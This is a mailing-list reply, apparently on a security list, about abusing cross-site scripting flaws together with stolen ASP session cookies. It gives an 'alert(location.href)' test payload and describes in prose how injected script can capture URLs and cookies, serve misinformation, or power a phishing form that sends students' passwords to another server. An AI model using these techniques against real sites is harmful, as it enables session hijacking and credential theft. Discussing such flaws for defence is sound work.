Re: using stolen aspsession ids

[dzzie () yahoo com]

> corresponding real query string.  wouldn't i need to connect to the server
> with a cookie: ASPSESSIONIDxxx=xxxxxxx to webpath/script.asp?xxxxx and
> know that id after the question mark, this wouldn't be possible just
> having the cookie I don't think.

if you can grab the cookie by inserting script into the page then
you can also grab the entire url of the page it is on including the
query string args with teh same script...try inserting a

alert(location.href)


> Also what other possibilities are there to exploit the cross site
> scripting hole, for example if there was an error page that only the user
> submitting the false url can see then what damage could be done?


One of the things with cross site scripting is that it can fool people
in visiting a trusted url. It may not even be an attack on your sight...
just using your sight to help exploit someone.

Somthign along the line of me having a link to your sight with some malicious
hex encoded script on the end so that when the user visits it (and semi trusting
that he is goign to some main stream sight) that he is actually exploited with
the script i got your server to echo to him and it looks like at least from the
user perspective that it is your fault...

not a biggie from server security perspective...but what if the script wrote out
a nice looking page of complete misinformation or some spammers ad..there goes
your bandwidth or the possibility of people believing some info came from a
trusted source..

imagine someone mailing students that they had to change passwords and directed
them to a cross sight scripted form on one of your servers that submitted the
info to another server? everythign would look like normal to the vast majority
of users.